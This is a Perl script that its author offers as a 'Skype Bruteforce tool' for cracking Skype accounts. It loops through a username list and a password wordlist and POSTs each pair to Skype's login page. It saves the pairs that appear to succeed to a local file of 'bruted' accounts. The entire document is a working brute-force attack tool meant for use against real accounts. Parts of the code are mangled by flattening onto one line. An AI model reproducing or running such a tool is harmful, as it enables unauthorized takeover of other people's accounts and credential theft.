#!/usr/bin/perl # #Skype Bruteforce tool By Imad'Ox Hunter # #Crack Skype Accouts with wordlist # #Imad'Ox Hunter : Hacking Tools Coder # #Contact : http://fb.com/imad.elouajib # #or : imadelouajib@gmail.com use Getopt::Std; use HTTP::Request::Common qw(POST); use LWP::UserAgent; $SIG{'INT'} = \&sig_catch;$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE'; $SIG{'CHLD'}='IGNORE';$SIG{'ALRM'}='IGNORE'; $| = 1; sub sig_catch { exit; } getopts('u:p:'); our($opt_u,$opt_p); my $userlist = $opt_u; my $passlist = $opt_p; if ($userlist eq "") { print "\n"; print "***************************************************************************\n"; print "Skype Bruteforcer \n"; print " By Imad'Ox Hunter \n"; print "usage: perl $0 -u -p \n"; print "***************************************************************************\n"; exit (1); } open(USERS, "<$userlist") || die ("Cannot open username file"); open(WORDS, "<$passlist") || die ("Cannot open password file"); @users= ; @words= ; close(USERS); close(WORDS); $i=0; foreach $user (@users) { chomp($user); foreach $pass (@words) { chomp($pass); $ua = LWP::UserAgent->new; printf("\n%5d Trying $user:$pass", ++$i); my $req = POST 'https://secure.skype.com/store/member/dologin.html', [ username => $user, password => $pass, login => 'Sign+me+in' ]; my $res = $ua->request($req); if ($res->as_string =~ /cookiecheck/gi) { open (LOG, ">>bruted_skype_accounts.txt"); $time = time(); $loctime = localtime($time); print LOG "\n"; print LOG "Time: $loctime\n"; print LOG "username: $user\n"; print LOG "passowrd: $pass\n\n"; close(LOG); }}}